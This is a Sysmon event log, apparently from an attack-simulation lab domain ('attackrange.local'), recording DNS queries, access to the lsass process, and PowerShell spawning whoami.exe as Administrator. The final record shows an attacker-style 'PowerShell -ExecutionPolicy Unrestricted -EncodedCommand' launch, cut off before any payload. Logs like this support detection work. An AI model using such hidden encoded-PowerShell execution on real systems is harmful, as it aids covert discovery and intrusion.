22542200x80000000000000002599Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.766{D28789B6-7C62-5FA1-0B00-000000008801}868_ldap._tcp.ForestDnsZones.attackrange.local.9003type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002598Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.755{D28789B6-7C62-5FA1-0B00-000000008801}868ForestDnsZones.attackrange.local.9003type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002597Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.746{D28789B6-7C62-5FA1-0B00-000000008801}868_ldap._tcp.Default-First-Site-Name._sites.DomainDnsZones.attackrange.local.9003type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002596Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.735{D28789B6-7C62-5FA1-0B00-000000008801}868_ldap._tcp.DomainDnsZones.attackrange.local.9003type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002595Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.717{D28789B6-7C62-5FA1-0B00-000000008801}868DomainDnsZones.attackrange.local.9003type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002594Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.680{D28789B6-7C62-5FA1-0B00-000000008801}868win-dc-807.attackrange.local010.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002593Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.680{D28789B6-7C62-5FA1-0B00-000000008801}868win-dc-807.attackrange.local0fe80::823:2ec6:f5ff:fef1;2001:0:2851:782c:823:2ec6:f5ff:fef1;fe80::4d6c:cfdc:29be:620c;C:\Windows\System32\lsass.exe 22542200x80000000000000002592Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.677{D28789B6-7C73-5FA1-3400-000000008801}2168win-dc-807.attackrange.local0fe80::823:2ec6:f5ff:fef1;2001:0:2851:782c:823:2ec6:f5ff:fef1;fe80::4d6c:cfdc:29be:620c;::ffff:10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000002591Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:42.566{D28789B6-7C64-5FA1-1200-000000008801}1216attackrange.local1460-C:\Windows\System32\svchost.exe 22542200x80000000000000002644Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.297{D28789B6-7C64-5FA1-1500-000000008801}1336attackrange.local0type: 2 win-dc-807.attackrange.local;10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002643Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.774{D28789B6-7C62-5FA1-0B00-000000008801}868_ldap._tcp.Default-First-Site-Name._sites.ForestDnsZones.attackrange.local.9003type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002642Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.773{D28789B6-7C64-5FA1-1500-000000008801}1336win-dc-807.attackrange.local9501type: 6 ;10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002649Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.340{D28789B6-7C62-5FA1-0B00-000000008801}868_ldap._tcp.ForestDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002648Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.338{D28789B6-7C62-5FA1-0B00-000000008801}868ForestDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002647Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.337{D28789B6-7C62-5FA1-0B00-000000008801}868_ldap._tcp.Default-First-Site-Name._sites.DomainDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002646Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.336{D28789B6-7C62-5FA1-0B00-000000008801}868_ldap._tcp.DomainDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002645Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.320{D28789B6-7C90-5FA1-7B00-000000008801}4444win-dc-807.attackrange.local0fe80::4d6c:cfdc:29be:620c;::ffff:10.0.1.14;C:\Windows\System32\taskhostw.exe 10341000x80000000000000002781Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.940{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002780Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.940{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002779Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.940{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002778Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.940{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002777Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.940{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002776Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.924{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002775Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.893{D28789B6-7C99-5FA1-8100-000000008801}50964368C:\Windows\system32\conhost.exe{D28789B6-7C99-5FA1-8400-000000008801}3564C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002774Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.893{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002773Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.893{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002772Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.893{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002771Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.893{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002770Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.893{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002769Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.893{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002768Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.893{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002767Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.893{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002766Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.893{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002765Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.893{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7C99-5FA1-8400-000000008801}3564C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002764Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.893{D28789B6-7C99-5FA1-8300-000000008801}23203560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C99-5FA1-8400-000000008801}3564C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31d4331b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e41a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e3e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c954db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311a4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31202edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311d8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e4889(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e447c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e41a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e3e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c954db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311cacd7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311ca2a7(wow64) 154100x80000000000000002763Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.898{D28789B6-7C99-5FA1-8400-000000008801}3564C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7C99-5FA1-C621-050000000000}0x521c60HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{D28789B6-7C99-5FA1-8300-000000008801}2320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 